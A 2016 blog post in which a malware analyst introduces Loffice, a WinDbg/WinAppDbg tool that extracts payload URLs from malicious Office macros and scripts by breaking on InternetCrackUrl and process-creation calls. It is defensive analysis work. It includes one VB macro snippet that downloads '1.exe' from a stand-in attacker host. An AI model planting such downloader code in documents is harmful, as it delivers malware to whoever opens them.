söndag 5 juni 2016

Loffice - Analyzing malicious documents using WinDbg

UPDATE: An updated version of loffice is available, details on the update is available here.

I found myself doing analysis of a larger number of malicious Office documents and Javascript "documents". And since the only thing I needed from them was the payload URL the manual analysis needed had to be automated to make it more efficient.

In the beginning I deobfuscated the documents by hand with some scripting included, but having seen the same type of documents over and over again I found myself just running the macro and extract the URL from memory. Still, there was too much manual work than I thought was needed, thinking that there must be a better, more controllable way.

Now, the result of this isn't really a new framework or package like oletools, rather I'm taking a different approach than doing analysis on the file itself while putting obfuscation out of play. This is inspired by dynamic analysis and debugging of regular malware executables.


Analysis beyond the document

VB-macro and Javascript can make use of for example MSXML2.XMLHTTP to interact with remote resources, this happens on a higher level compared to using WinAPI.

httpObject = CreateObject("MSXML2.XMLHTTP")
httpObject.Open "GET", "http://evil.domain/1.exe", False
httpObject.send()


The above is very simple but all of the magic responsible for making an actual HTTP-request is done behind the scenes. One of the things that is done is break down the URL in it's base components such as hostname and path before it can be used by Windows internal functions in for example WinInet.

MSXML2.XMLHTTP is built upon the URLmon which rely on WinInet. WinInet have a function for "cracking" a URL to its base components called InternetCrackUrl. So before a URL is retrieved it needs to be cracked which result in that any obfuscation plays a much smaller roll in the analysis as the deobfuscation takes place before InternetCrackUrl is called.

So rather than attacking the document at a script-level, we're attacking it on a lower level with a debugger. Lets look at an example how this works in practice.

WinDbg is the weapon of choice. For this example I'm using a malicious Word document from one of the Dridex campaigns. So by launching Word and attaching WinDbg and setting a breakpoint on InternetCrackUrlW it's not long before the breakpoint is hit when enabling macro inside the document.



With execution halted on the first instruction in InternetCrackUrlW, the parameters to the function is available on the stack, including the URL. The URL is the first argument passed and is found on ESP+4 (as I'm running on 32-bit).




So basically, without having to deobfuscate any code or uploading the document to a sandbox, a URL is found pointing to an executable which can be used to do further analysis.


Loffice - Lazy Office Analyzer

The beauty of WinDbg is that there is a Python module for controlling the debugger called WinAppDbg. If you haven't heard of or used it, I highly recommend looking into it, extremely useful.

What's essentially needed is to set a breakpoint on InternetCrackUrl as soon as wininet.dll is loaded into memory and reading the URL when the breakpoint is hit.

So I wrote a utility (Loffice) that makes use of this technique. It also includes a few other functions such as CreateFileW and CreateProcessW, these will enable extraction of the file path which a file will be written to and also if any new processes are to be launched.

WinInet isn't the only library that can be used to interact with an URL through macros and scripts, there is also WinHTTP, this is covered via WinHTTPCrackUrl, thereby covering both WinHTTP- and WinInet-based URL fetching.

To make it more dynamic I added some options on how loffice should behave when hitting a breakpoint.


Running loffice on a Word document and a Javascript "document":



One thing to note is that if loffice is told to exit on first URL extraction it would also exit if a new process is created. This is to make sure that control over the execution isn't lost to another process due to no URLs' found in the document.

I'll look into using hooks instead of breakpoints later on to be able to control the results of HTTP-related calls which would enable a higher chance of extracting all of the URLs' in a document/script instead of only the first. This is useful if a document only fetch from the first URL if it succeds.

Summary

So this isn't really your stand-alone tool for static analysis but rather a utility for applying controlled dynamic analysis on documents and scripts.

Rather than having to keep up with (de)obfuscation techniques, updating scripts or doing manual deobfuscation it's possible to let the host application do all the deobfuscation and take over when the interesting stuff such as HTTP requests are to be made.

This does, as you might have figured out rely on WinDbg and Microsoft Office. There is currently only supported on 32-bit systems (for now).

This initial version is basically a proof of concept that I will continue to work on. If you've got any thoughts/comments/suggestions, let me know.

Small update on the project

So after some time I got around to do put some more work into this. The above details the background of the project, since then I've added support for detecting and bypassing some anti-analysis via WMI but also exit on process creation via WMI, which now should the most common ways of creating processes from macros/scripts.

Loffice now supports 64-bit as well, I do however recommend that you don't mix winappdbg and Python version (32/64-bit), this is a warning from winappdbg the developer.

Loffice is available on Github.

3 kommentarer:

  1. Thank you so much. This is exceptional useful. Have you think about office with Powershell command? can we use WinDbg in this case?

    SvaraRadera
    Svar
    1. Glad that its of use. Do I understand you correctly about launching Powershell from Office documents? This is covered as launching Powershell from an Office macro would call CreateProcess. In such case you would get the commandline used for launching Powershell, such as the long base64-encoded Powershell script commonly seen.

      Radera